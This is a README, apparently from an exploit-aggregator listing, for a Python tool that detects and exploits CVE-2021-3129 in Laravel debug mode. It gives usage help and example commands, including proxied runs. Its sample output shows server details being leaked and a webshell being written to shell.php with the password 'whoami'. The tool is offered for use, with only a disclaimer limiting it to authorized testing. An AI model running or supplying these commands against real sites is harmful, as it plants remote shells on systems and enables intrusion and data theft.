Share
## https://sploitus.com/exploit?id=85CC8F81-2E10-5C33-80A8-0F7EA5C645F0
# Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp
> CVE-2021-3129 exp / poc 
- 注意⚠️:因该漏洞利用与检测会发送多次请求,可能导致利用与检测过程缓慢
- usage:
```python
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

Laravel Debug mode RCE(CVE-2021-3129)POC & EXP

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定目标url地址
  -e, --exp             利用漏洞写入webshell,如不指定,则仅进行漏洞检测
  -p PROXY, --proxy PROXY
                        设置代理,如socks5://127.0.0.1:7890
```

- example:
```python
# poc
python CVE-2021-3129.py -u http://xxxxx.com 
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] 成功写入webshell, 访问地址 http://xxxxx.com/shell.php , 密码 whoami

# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
```
- 参考链接
  - https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g
  - https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
  - https://github.com/nth347/CVE-2021-3129_exploit
  - https://github.com/ambionics/phpggc
  

- 使用须知
  - 本工具仅面向合法授权的企业安全建设行为,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。
  - 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。